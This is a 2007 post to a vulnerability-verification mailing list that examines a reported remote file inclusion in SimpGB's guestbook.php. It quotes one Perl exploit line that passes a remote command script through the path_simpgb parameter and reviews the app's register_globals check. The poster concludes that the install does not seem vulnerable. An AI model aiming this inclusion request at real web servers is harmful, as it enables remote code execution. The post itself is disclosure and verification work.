[VIM] probably true: SimpGB RFI, likely dynamic variable evaluation

str0ke str0ke at milw0rm.com
Thu May 24 19:03:57 UTC 2007


exploit code
#######################
$req = HTTP::Request->new(GET
=>$Path.'guestbook.php?path_simpgb='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or
die "\nCould Not connect\n";
#######################

by default the config.php script doesn't initialize the no_rgcheck
variable it just has it commented out, pretty easy to bypass this if
register globals = on.
#########################
if(!$no_rgcheck)
{
	$rg_ini=@ini_get('register_globals');
	if($rg_ini || (strtolower($rg_ini)=='on'))
		die("register_globals should be set to off for security reasons");
}

# This shouldn't overwrite path_ or url_ variables correct?
while( list($var, $param) = @each($_GET) )
{
	if(!isset($$var))
	{
		if((substr($var,0,4)!="url_") && (substr($var,0,5)!="path_"))
		{
			$$var=$_GET[$var];
			if(!get_magic_quotes_gpc())
				$$var=addslashes($$var);
		}
	}
}

After installing the app it doesn't seem vulnerable. With or without
the rg check.

/str0ke


More information about the VIM mailing list